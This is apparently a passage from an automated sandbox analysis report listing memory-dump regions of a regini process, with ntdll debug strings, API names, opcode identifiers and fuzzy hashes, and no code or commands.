                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                              • API String ID: 0-484625025
                                                                                                              • Opcode ID: 1b468c056ede539b1385058c76e1f56638773b647ecbeec02af3f107226a912b
                                                                                                              • Instruction ID: 2fdd819de320bc85eda1b7933be2301bf9cb9340d3e03ed0800f8f26001da04b
                                                                                                              • Opcode Fuzzy Hash: 1b468c056ede539b1385058c76e1f56638773b647ecbeec02af3f107226a912b
                                                                                                              • Instruction Fuzzy Hash: E451E7316402596AFF11ABA8DCA5FEEB7B9EF04304F140099D506A7391EB71DE45CFA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dad6e1db5e3d3d8823d2c43483b14c2c43ab845b26913b2440fe7246af2d475b
                                                                                                              • Instruction ID: ee695c9d822f13d900e9ae5183529eefb4eb13bf181944a1232efa5c72160343
                                                                                                              • Opcode Fuzzy Hash: dad6e1db5e3d3d8823d2c43483b14c2c43ab845b26913b2440fe7246af2d475b
                                                                                                              • Instruction Fuzzy Hash: 95022671548341AFC709DF18D490A6FBBEAEFC9704F04992DF9894B264DB31E905CB92
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-$0$0
                                                                                                              • API String ID: 1302938615-699404926
                                                                                                              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                              • Instruction ID: 9e674b193383a435f2229079432360430e6a98b784cd057ee353bacd58c3293f
                                                                                                              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                              • Instruction Fuzzy Hash: 6E818E74E05249DEDF268E68C8A17EEBBA2AF45318F18415BDC93AB790C7349C40CB61
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                              • API String ID: 48624451-2819853543
                                                                                                              • Opcode ID: 5b0c0d7147783336c8aaa390c41aaa848c89ffafbc3444ea05018ec1488a742a
                                                                                                              • Instruction ID: 854b5074efc422949a3988a95b4b4dce4e6eee094b76107a7f5694d583108d34
                                                                                                              • Opcode Fuzzy Hash: 5b0c0d7147783336c8aaa390c41aaa848c89ffafbc3444ea05018ec1488a742a
                                                                                                              • Instruction Fuzzy Hash: 81218176A00129ABDB10DF79DC54EFEBBE9EF44748F04412AEE06E3200E73099058BB0
                                                                                                              Strings
                                                                                                              • RTL: Re-Waiting, xrefs: 02DE031E
                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02DE02BD
                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02DE02E7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                              • API String ID: 0-2474120054
                                                                                                              • Opcode ID: 5454f19fc5cd9e43090a0312380e1b48fd9e5843312a97851d7f1b08fbdd045e
                                                                                                              • Instruction ID: 6df724197e3dc11a8081328621912b1bb51fdf12ce980094f9c8e539822c396f
                                                                                                              • Opcode Fuzzy Hash: 5454f19fc5cd9e43090a0312380e1b48fd9e5843312a97851d7f1b08fbdd045e
                                                                                                              • Instruction Fuzzy Hash: BCE1BA306087419FDB25DF28C884B2AB7E1EB84328F144A69F5A6DB7E0D7B5DC44CB52
                                                                                                              Strings
                                                                                                              • RTL: Re-Waiting, xrefs: 02DE7BAC
                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02DE7B7F
                                                                                                              • RTL: Resource at %p, xrefs: 02DE7B8E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 0-871070163
                                                                                                              • Opcode ID: 185ef83d9776aeefd3b1ff2946b1ebdcd21aa71c4d4ada53b5fbddec345450ee
                                                                                                              • Instruction ID: 856b5d576b62fbc9df1270be725008b0ee3ccccd955c523789a0b051825db4d1
                                                                                                              • Opcode Fuzzy Hash: 185ef83d9776aeefd3b1ff2946b1ebdcd21aa71c4d4ada53b5fbddec345450ee
                                                                                                              • Instruction Fuzzy Hash: 0541BF317047029FDB20DE258850F6AB7E5EF98714F140A1EE996DB780DB71ED06CB91
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02DE728C
                                                                                                              Strings
                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02DE7294
                                                                                                              • RTL: Re-Waiting, xrefs: 02DE72C1
                                                                                                              • RTL: Resource at %p, xrefs: 02DE72A3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-605551621
                                                                                                              • Opcode ID: 31d2276c35eb27e6c92cb71e6c69e074ce29d17b6a162c5801b02304384b8503
                                                                                                              • Instruction ID: 06e4e0b19c85fb6ab97c055e9c0ee5fc02b86f5f103f8564535159e2d6b1e80b
                                                                                                              • Opcode Fuzzy Hash: 31d2276c35eb27e6c92cb71e6c69e074ce29d17b6a162c5801b02304384b8503
                                                                                                              • Instruction Fuzzy Hash: CB41E331700202ABEB21DE25CC41F66B7A5FF54718F104619F996DB380DB61EC46DBE1
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              • Opcode ID: e3070000a7d546318fed43d99404a6513f10d23fadb19e10823c5c72697ca0b0
                                                                                                              • Instruction ID: d9f348a9c8a9347c422e72a830d998727055c2c7c320ead128cdb24db0b3afec
                                                                                                              • Opcode Fuzzy Hash: e3070000a7d546318fed43d99404a6513f10d23fadb19e10823c5c72697ca0b0
                                                                                                              • Instruction Fuzzy Hash: 3C31B872A002299FDB20DE28CD50BEE77F8EF44714F445455ED4AE3200EB309A488F60
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-
                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                              • Instruction ID: ed9ceeb4faa41433a514d93a05f7be91a880419cfd4d04cf4fb5a2b0caab7ae7
                                                                                                              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                              • Instruction Fuzzy Hash: A3918372E00206DBEB26DE69C8A46FEF7A5AF88764F54451AE856EB3C0D7308D40CB54
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 0-1194432280
                                                                                                              • Opcode ID: 8dda07bbbb569e06c2dd4fd39aeb1c5afb1d0b7f6dbf2d36a3838be2e75ada78
                                                                                                              • Instruction ID: 3b4acb65b6a823b55c8cab803fafbedd0fd99da0c9414505f16192106dc7d7cd
                                                                                                              • Opcode Fuzzy Hash: 8dda07bbbb569e06c2dd4fd39aeb1c5afb1d0b7f6dbf2d36a3838be2e75ada78
                                                                                                              • Instruction Fuzzy Hash: 31812C76D002699BDB31DB54CC54BEEB7B8AB08754F0041DAEA19B7350E7349E84CFA0